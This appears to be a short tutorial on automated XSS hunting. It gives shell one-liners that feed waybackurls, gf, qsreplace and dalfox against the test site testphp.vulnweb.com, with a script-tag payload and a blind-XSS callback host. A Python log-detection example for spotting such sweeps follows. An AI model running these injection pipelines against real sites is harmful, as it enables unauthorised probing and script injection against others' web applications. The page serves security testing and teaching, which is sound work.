Automated XSS
Make sure you have Go installed on your Machine

To Install Go on your Machine:

1) sudo apt install -y golang
2) export GOROOT=/usr/lib/go
3) export GOPATH=$HOME/go
4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
5) source .bashrc

How to Hunt Blind XSS using Dalfox?

  • Use waybackurls by tomnomnom to fetch URLs for a specific target.
  • Use gf patterns to find parameters that are possibly vulnerable to XSS.
  • Use Dalfox to find XSS.
  • Steps :
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt

How to Hunt Reflected XSS?

  • Use waybackurls by tomnomnom to fetch URLs for a specific target.
  • Use qsreplace, which accepts URLs on stdin, replaces all query string values with a user-supplied value, and outputs each combination of query string parameters only once per host and path.
  • Steps :
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | while read -r host; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo -e "$host \033[0;31mVulnerable\033[0m"; done
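
On the defending side, the sweep above leaves a recognisable trace in access logs, because qsreplace puts the same payload in every query parameter. The following Python detection is an added example, not part of the original page or of QuickXSS; the log lines are constructed samples, and the function names and the min_hits threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = '''\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /listproducts.php?cat=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 734 "-" "curl/8.5.0"
198.51.100.20 - - [10/Mar/2024:10:00:03 +0000] "GET /search.php?q=red+shoes&page=2 HTTP/1.1" 200 1290 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2024:10:00:05 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 990 "-" "Mozilla/5.0"
'''

# Client address and request target from a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that should not normally appear in a decoded query value.
MARKUP_RE = re.compile(r'[<>"\']')


def is_sweep_request(target):
    """True when every query value is one identical string containing markup."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    values = {value for _, value in pairs}
    return bool(pairs) and len(values) == 1 and bool(MARKUP_RE.search(values.pop()))


def find_sweeps(log_text, min_hits=2):
    """Return {client_ip: count} for clients with at least min_hits sweep requests."""
    hits = Counter()
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if match and is_sweep_request(match.group(2)):
            hits[match.group(1)] += 1
    return {ip: count for ip, count in hits.items() if count >= min_hits}


if __name__ == "__main__":
    for ip, count in find_sweeps(SAMPLE_LOG).items():
        print(f"{ip}: {count} requests with one markup payload in every parameter")
```

A single matching request is weak evidence on its own; the per-client count is what separates a sweep from a stray hit.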

Tools Download Links:-

Find Script here : QuickXSS
If you have any questions, reach out to me via Twitter

Twitter : Fani Malik

Twitter : Faizee Asad